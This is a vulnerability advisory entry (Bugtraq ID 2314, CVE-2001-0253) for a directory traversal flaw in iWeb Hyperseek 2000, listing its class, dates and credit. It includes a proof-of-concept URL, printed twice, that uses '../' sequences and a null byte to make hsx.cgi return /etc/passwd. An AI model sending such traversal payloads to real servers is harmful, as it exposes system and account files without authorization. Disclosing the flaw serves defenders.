iWeb Hyperseek 2000 Directory Traversal Vulnerability
BID:2314
Info
iWeb Hyperseek 2000 Directory Traversal Vulnerability
| Bugtraq ID: | 2314 |
| Class: | Input Validation Error |
| CVE: |
CVE-2001-0253 |
| Remote: | Yes |
| Local: | Yes |
| Published: | Jan 28 2001 12:00AM |
| Updated: | Jul 11 2009 04:46AM |
| Credit: | Discovered and posted to Bugtraq by MC GaN <[email protected]> on Jan 28, 2001. |
| Vulnerable: |
iWeb Systems HyperSeek 2000 |
| Not Vulnerable: | |
Exploit / POC
iWeb Hyperseek 2000 Directory Traversal Vulnerability
The following example has been provided by MC GaN <[email protected]>:
http://target/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/passwd%00
The following example has been provided by MC GaN <[email protected]>:
http://target/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/passwd%00